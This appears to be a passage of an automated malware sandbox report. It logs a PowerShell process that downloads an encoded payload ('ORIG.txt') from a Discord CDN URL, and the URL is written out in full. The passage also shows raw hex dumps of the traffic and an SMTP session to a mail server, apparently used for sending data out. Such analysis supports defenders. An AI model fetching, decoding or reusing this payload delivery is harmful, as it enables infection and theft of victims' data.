                                                2024-08-27 05:53:43 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                                Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                                2024-08-27 05:53:43 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                                Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                                2024-08-27 05:53:43 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                                Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                                2024-08-27 05:53:43 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                                Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                                2024-08-27 05:53:43 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                                Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                                2024-08-27 05:53:43 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                                Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                                2024-08-27 05:53:43 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                                Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549705162.159.135.2334431964C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-08-27 05:53:45 UTC221OUTGET /attachments/1277433180093157459/1277662781419552829/ORIG.txt?ex=66cdfbb0&is=66ccaa30&hm=d1c475c40c3b46b0e27e96cbd9d311f2634d5d9ee85c92712f601947bf5e518f& HTTP/1.1
                                                Host: cdn.discordapp.com
                                                Connection: Keep-Alive
                                                2024-08-27 05:53:45 UTC1185INHTTP/1.1 200 OK
                                                Date: Tue, 27 Aug 2024 05:53:45 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 334508
                                                Connection: close
                                                CF-Ray: 8b99cd94bb2d4271-EWR
                                                CF-Cache-Status: HIT
                                                Accept-Ranges: bytes, bytes
                                                Age: 47001
                                                Cache-Control: public, max-age=31536000
                                                Content-Disposition: attachment; filename="ORIG.txt"
                                                ETag: "78f25bff84b91bb52702142d061d7837"
                                                Expires: Wed, 27 Aug 2025 05:53:45 GMT
                                                Last-Modified: Mon, 26 Aug 2024 16:15:44 GMT
                                                Vary: Accept-Encoding
                                                alt-svc: h3=":443"; ma=86400
                                                x-goog-generation: 1724688944981728
                                                x-goog-hash: crc32c=kOzxwg==
                                                x-goog-hash: md5=ePJb/4S5G7UnAhQtBh14Nw==
                                                x-goog-metageneration: 1
                                                x-goog-storage-class: STANDARD
                                                x-goog-stored-content-encoding: identity
                                                x-goog-stored-content-length: 334508
                                                x-guploader-uploadid: AHxI1nPoAVd1JDGVKTS7LsvZMhrp7Yb2f3Hrl1LGh3eMsYSlGFZMJzIX2belgIYbcp8vro1R4w
                                                X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                Set-Cookie: __cf_bm=7s7etQRQQMe2_ff6E1ssF_dmMcLlBvPdEa70g1Bg3hU-1724738025-1.0.1.1-1Z4qaA81e5JrIfafs8gbqxWQQStwbu3XST3e4IUDQnVq.5m9iU4MAmUVL0gnYs_B7dPofocFTbUF_C6u2gogjg; path=/; expires=Tue, 27-Aug-24 06:23:45 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                2024-08-27 05:53:45 UTC523INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 34 3f 73 3d 52 59 44 33 79 76 48 46 75 79 75 53 4d 62 37 37 77 4c 79 74 56 25 32 42 35 49 62 78 66 78 52 69 30 35 44 42 5a 64 5a 31 58 48 5a 38 35 58 4f 57 31 75 48 30 69 67 31 58 4f 45 4f 7a 50 34 49 6f 55 31 79 6f 25 32 42 6e 48 56 6f 65 33 63 68 25 32 42 6d 25 32 46 41 54 73 61 6b 4d 34 71 25 32 42 41 6b 7a 48 51 69 25 32 46 52 4b 66 79 66 32 69 62 70 4b 62 5a 30 7a 63 58 42 45 32 73 25 32 46 36 38 4a 78 6b 51 41 39 46 44 6b 67 72 71 47 79 74 39 51 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d
                                                Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RYD3yvHFuyuSMb77wLytV%2B5IbxfxRi05DBZdZ1XHZ85XOW1uH0ig1XOEOzP4IoU1yo%2BnHVoe3ch%2Bm%2FATsakM4q%2BAkzHQi%2FRKfyf2ibpKbZ0zcXBE2s%2F68JxkQA9FDkgrqGyt9Q%3D%3D"}],"group":"cf-nel","m
                                                2024-08-27 05:53:45 UTC1369INData Raw: 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                Data Ascii: =AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                2024-08-27 05:53:45 UTC1369INData Raw: 34 32 62 70 4e 6e 63 6c 5a 48 49 35 52 58 61 30 35 57 5a 6b 6c 55 65 73 4a 57 62 6c 4e 33 63 68 78 44 49 67 6f 51 44 2b 49 43 4d 75 45 6a 49 39 34 32 62 70 4e 6e 63 6c 5a 46 64 7a 56 6d 5a 70 35 57 59 74 42 69 49 78 59 6e 4c 74 4e 58 59 36 30 32 62 6a 31 43 64 6d 39 32 63 76 4a 33 59 70 31 57 4c 7a 46 57 62 6c 68 32 59 7a 70 6a 62 79 56 6e 49 39 4d 6e 62 73 31 47 65 67 6b 48 62 69 31 57 5a 7a 4e 58 59 38 6f 51 44 2b 38 6a 49 7a 56 57 65 69 30 54 5a 75 39 47 62 68 52 6d 62 68 52 33 63 67 49 43 4f 74 59 45 56 56 4a 53 50 6e 35 57 61 6b 39 32 59 75 56 47 49 69 41 6a 4c 78 49 53 50 75 39 57 61 7a 4a 58 5a 32 42 43 62 74 68 33 50 38 38 37 75 76 44 41 41 41 41 44 41 75 41 41 4d 41 34 43 41 77 41 67 4c 41 45 44 41 41 41 67 62 41 38 47 41 70 42 77 63 41 49 48 41
                                                Data Ascii: 42bpNnclZHI5RXa05WZklUesJWblN3chxDIgoQD+ICMuEjI942bpNnclZFdzVmZp5WYtBiIxYnLtNXY602bj1Cdm92cvJ3Yp1WLzFWblh2YzpjbyVnI9Mnbs1GegkHbi1WZzNXY8oQD+8jIzVWei0TZu9GbhRmbhR3cgICOtYEVVJSPn5Wak92YuVGIiAjLxISPu9WazJXZ2BCbth3P887uvDAAAADAuAAMA4CAwAgLAEDAAAgbA8GApBwcAIHA
                                                2024-08-27 05:53:45 UTC1369INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                2024-08-27 05:53:45 UTC1369INData Raw: 41 67 55 41 43 55 48 6f 45 42 45 4f 67 52 55 52 64 52 55 58 45 70 4d 6f 45 6c 4d 6f 45 55 48 6f 45 68 4d 6f 45 64 4d 6f 45 46 30 52 47 53 6b 78 67 53 55 78 67 53 55 78 67 53 34 77 42 72 30 76 67 53 45 49 67 53 45 6c 45 42 4d 41 49 4c 30 75 67 52 45 78 67 52 45 78 67 52 45 77 41 67 77 67 43 35 4c 6f 45 42 49 41 49 48 55 49 67 53 41 41 41 46 67 41 43 42 49 41 49 46 55 77 67 52 41 41 49 46 30 77 67 53 41 41 41 46 6b 77 67 53 45 77 67 53 45 41 41 49 6b 76 67 53 59 41 42 31 4c 6f 45 64 41 41 49 47 67 51 42 44 47 52 42 44 47 52 42 44 47 52 42 44 47 52 47 53 6b 68 45 42 4d 6f 45 39 4c 6f 45 42 43 6f 45 35 4c 6f 45 31 4c 6f 45 78 4c 6f 45 74 4c 59 45 4f 63 41 4b 49 67 51 48 53 55 51 48 45 63 41 43 63 49 51 41 41 51 41 43 46 46 6f 45 4f 45 72 67 53 34 51 34 43 4b
                                                Data Ascii: AgUACUHoEBEOgRURdRUXEpMoElMoEUHoEhMoEdMoEF0RGSkxgSUxgSUxgS4wBr0vgSEIgSElEBMAIL0ugRExgRExgREwAgwgC5LoEBIAIHUIgSAAAFgACBIAIFUwgRAAIF0wgSAAAFkwgSEwgSEAAIkvgSYAB1LoEdAAIGgQBDGRBDGRBDGRBDGRGSkhEBMoE9LoEBCoE5LoE1LoExLoEtLYEOcAKIgQHSUQHEcACcIQAAQACFFoEOErgS4Q4CK
                                                2024-08-27 05:53:45 UTC1369INData Raw: 53 45 51 34 41 47 52 46 49 77 68 44 64 49 68 41 67 59 41 43 45 47 6f 45 42 45 4f 67 52 55 42 43 46 30 42 43 46 30 42 43 46 30 42 67 42 47 42 68 42 4b 52 42 46 55 51 48 53 30 68 45 50 63 51 49 49 41 59 67 52 51 59 67 53 51 59 67 53 51 59 67 53 51 59 67 53 30 42 68 42 4b 52 48 45 47 6f 45 64 51 59 67 53 67 51 42 64 67 41 68 42 4b 52 44 48 55 43 43 46 30 68 41 48 55 41 43 4a 4b 6f 45 43 63 67 42 49 55 6f 67 53 49 77 42 47 45 6f 67 53 34 51 41 67 59 51 66 43 4b 42 41 41 55 67 43 43 49 67 44 64 51 77 42 48 67 51 65 53 6b 66 67 53 34 51 48 74 47 6f 45 4f 45 51 54 53 55 68 42 48 49 42 43 73 46 6f 45 42 45 4f 67 52 55 68 44 73 46 6f 45 4f 77 57 67 53 67 41 62 42 4b 52 41 4e 4a 52 46 59 46 6f 45 4a 63 67 48 41 34 52 41 6c 46 6f 45 56 41 67 48 42 45 41 45 4d 67 77
                                                Data Ascii: SEQ4AGRFIwhDdIhAgYACEGoEBEOgRUBCF0BCF0BCF0BgBGBhBKRBFUQHS0hEPcQIIAYgRQYgSQYgSQYgSQYgS0BhBKRHEGoEdQYgSgQBdgAhBKRDHUCCF0hAHUACJKoECcgBIUogSIwBGEogS4QAgYQfCKBAAUgCCIgDdQwBHgQeSkfgS4QHtGoEOEQTSUhBHIBCsFoEBEOgRUhDsFoEOwWgSgAbBKRANJRFYFoEJcgHA4RAlFoEVAgHBEAEMgw
                                                2024-08-27 05:53:45 UTC1369INData Raw: 55 51 48 49 34 67 44 4f 67 56 67 53 34 41 51 42 4b 52 41 4e 4a 52 46 4f 45 51 54 53 55 52 44 48 38 42 43 49 34 51 48 49 34 51 48 49 34 51 48 4f 30 52 6c 42 4b 52 49 43 4b 68 44 56 47 6f 45 68 49 6f 45 4f 34 51 48 4f 30 68 44 4f 34 51 41 4e 4a 52 46 4f 30 68 44 56 63 67 4b 49 6b 6e 45 35 48 6f 45 35 4a 52 2b 42 4b 68 44 42 45 4f 67 52 55 52 72 42 4b 52 72 42 4b 68 44 4f 45 51 54 53 55 68 44 42 30 6b 45 56 73 77 42 6b 67 67 44 42 45 4f 67 52 55 42 51 42 4b 68 44 4f 45 51 54 53 55 42 51 42 4b 52 41 4e 4a 52 46 47 63 51 47 43 67 52 41 43 41 53 42 49 67 41 43 43 41 51 42 49 67 67 44 64 67 67 44 46 30 42 43 49 41 55 67 53 67 41 43 46 30 52 42 64 67 53 67 53 34 51 70 42 4b 42 47 4f 41 55 67 53 45 51 54 53 55 78 45 48 55 79 41 4f 45 41 41 45 67 77 41 64 4d 51 48
                                                Data Ascii: UQHI4gDOgVgS4AQBKRANJRFOEQTSURDH8BCI4QHI4QHI4QHO0RlBKRICKhDVGoEhIoEO4QHO0hDO4QANJRFO0hDVcgKIknE5HoE5JR+BKhDBEOgRURrBKRrBKhDOEQTSUhDB0kEVswBkggDBEOgRUBQBKhDOEQTSUBQBKRANJRFGcQGCgRACASBIgACCAQBIggDdggDF0BCIAUgSgACF0RBdgSgS4QpBKBGOAUgSEQTSUxEHUyAOEAAEgwAdMQH
                                                2024-08-27 05:53:45 UTC1369INData Raw: 51 48 49 67 41 43 49 30 42 43 64 34 77 44 48 67 42 43 49 55 51 48 49 4d 41 49 48 6f 41 43 42 41 41 42 78 49 59 45 74 49 59 45 70 49 59 45 4f 45 41 42 67 30 41 43 41 46 6f 45 42 45 4f 67 52 55 68 44 42 45 4f 67 52 55 68 44 42 45 4f 67 52 55 68 44 42 45 4f 67 52 55 42 51 42 4b 52 41 4e 4a 52 46 41 46 6f 45 43 34 41 43 49 67 41 43 41 46 6f 45 49 34 67 41 43 55 51 48 49 45 69 67 53 34 67 44 4f 34 51 41 4e 4a 52 46 4f 34 51 41 4e 4a 52 46 4f 45 51 54 53 55 68 44 4f 34 67 44 41 46 6f 45 42 30 6b 45 56 45 79 42 59 68 41 43 4f 30 42 51 42 4b 52 41 4e 4a 52 46 41 46 6f 45 4f 34 41 48 59 6b 50 67 53 77 52 2b 41 4b 42 47 59 6b 50 67 53 67 52 2b 41 4b 52 49 52 6b 50 67 53 67 42 48 49 67 42 47 49 67 52 49 52 77 42 43 59 67 41 47 49 6b 6c 45 49 67 51 61 42 4b 68 44 4f
                                                Data Ascii: QHIgACI0BCd4wDHgBCIUQHIMAIHoACBAABxIYEtIYEpIYEOEABg0ACAFoEBEOgRUhDBEOgRUhDBEOgRUhDBEOgRUBQBKRANJRFAFoEC4ACIgACAFoEI4gACUQHIEigS4gDO4QANJRFO4QANJRFOEQTSUhDO4gDAFoEB0kEVEyBYhACO0BQBKRANJRFAFoEO4AHYkPgSwR+AKBGYkPgSgR+AKRIRkPgSgBHIgBGIgRIRwBCYgAGIklEIgQaBKhDO
                                                2024-08-27 05:53:45 UTC1369INData Raw: 67 53 45 51 54 53 55 42 43 48 6f 42 43 41 46 6f 45 42 30 6b 45 56 41 55 67 53 34 51 66 42 4b 68 44 39 46 6f 45 4f 34 67 44 4f 34 41 51 42 4b 52 41 4e 4a 52 46 4e 63 51 49 4f 55 66 67 53 45 41 49 47 30 5a 67 53 30 42 41 67 59 67 44 64 47 6f 45 64 45 41 49 48 67 41 43 64 47 6f 45 64 67 51 6e 42 4b 52 48 41 46 6f 45 4f 34 51 37 42 4b 68 44 64 47 6f 45 64 47 6f 45 64 47 6f 45 4f 41 55 67 53 45 51 54 53 55 78 44 48 63 43 43 4f 49 77 42 45 67 41 43 4f 30 68 44 4f 34 51 48 47 63 67 43 49 67 67 44 64 34 67 44 4f 30 68 44 4f 67 77 42 4d 55 51 41 4b 4d 67 41 4f 55 61 67 53 49 41 49 48 67 41 43 4f 30 42 51 42 4b 52 41 4e 4a 52 46 41 46 6f 45 4f 55 51 48 46 30 68 44 6c 47 6f 45 4f 34 51 48 6c 47 6f 45 41 46 6f 45 42 30 6b 45 56 34 77 42 6d 67 41 43 4f 30 42 43 4f 30
                                                Data Ascii: gSEQTSUBCHoBCAFoEB0kEVAUgS4QfBKhD9FoEO4gDO4AQBKRANJRFNcQIOUfgSEAIG0ZgS0BAgYgDdGoEdEAIHgACdGoEdgQnBKRHAFoEO4Q7BKhDdGoEdGoEdGoEOAUgSEQTSUxDHcCCOIwBEgACO0hDO4QHGcgCIggDd4gDO0hDOgwBMUQAKMgAOUagSIAIHgACO0BQBKRANJRFAFoEOUQHF0hDlGoEO4QHlGoEAFoEB0kEV4wBmgACO0BCO0
                                                2024-08-27 05:53:45 UTC1369INData Raw: 53 41 41 49 46 45 5a 67 53 41 41 49 46 67 67 44 64 30 53 67 53 4d 77 42 49 67 41 43 46 30 68 44 44 41 79 42 6c 46 52 42 64 55 51 48 46 30 78 41 41 6f 51 69 42 47 52 68 42 4b 52 41 43 41 51 43 49 55 51 48 46 30 78 41 48 63 41 43 41 46 6f 45 49 34 51 48 4f 41 55 67 53 45 51 54 53 55 68 44 48 63 67 45 49 34 51 41 67 51 41 43 41 46 6f 45 42 30 6b 45 56 34 67 44 4f 55 77 42 4e 6b 58 67 52 34 67 44 4f 30 78 41 41 6b 51 63 42 47 68 44 42 41 67 42 49 67 67 44 64 41 55 67 53 45 51 54 53 55 68 44 4f 34 77 42 48 41 42 41 54 45 77 45 42 41 69 42 41 4d 68 41 42 41 53 42 5a 4a 42 43 42 41 51 42 42 4d 42 41 54 45 67 41 67 63 67 44 68 45 68 41 64 4a 52 46 48 6b 57 67 53 41 41 49 46 30 57 67 53 41 41 41 46 67 41 47 41 46 6f 45 42 30 6b 45 56 34 51 49 52 49 51 58 53 55 42
                                                Data Ascii: SAAIFEZgSAAIFggDd0SgSMwBIgACF0hDDAyBlFRBdUQHF0xAAoQiBGRhBKRACAQCIUQHF0xAHcACAFoEI4QHOAUgSEQTSUhDHcgEI4QAgQACAFoEB0kEV4gDOUwBNkXgR4gDO0xAAkQcBGhDBAgBIggDdAUgSEQTSUhDO4wBHABATEwEBAiBAMhABASBZJBCBAQBBMBATEgAgcgDhEhAdJRFHkWgSAAIF0WgSAAAFgAGAFoEB0kEV4QIRIQXSUB


                                                TimestampSource PortDest PortSource IPDest IPCommands
                                                Aug 27, 2024 07:53:49.107600927 CEST58749707185.230.212.164192.168.2.5220 mx.zoho.eu SMTP Server ready August 27, 2024 7:53:48 AM CEST
                                                Aug 27, 2024 07:53:49.108108044 CEST49707587192.168.2.5185.230.212.164EHLO 045012
                                                Aug 27, 2024 07:53:49.404326916 CEST58749707185.230.212.164192.168.2.5250-mx.zoho.eu Hello 045012 (8.46.123.33 (8.46.123.33))
                                                250-STARTTLS
                                                250 SIZE 53477376
                                                Aug 27, 2024 07:53:49.434470892 CEST49707587192.168.2.5185.230.212.164STARTTLS
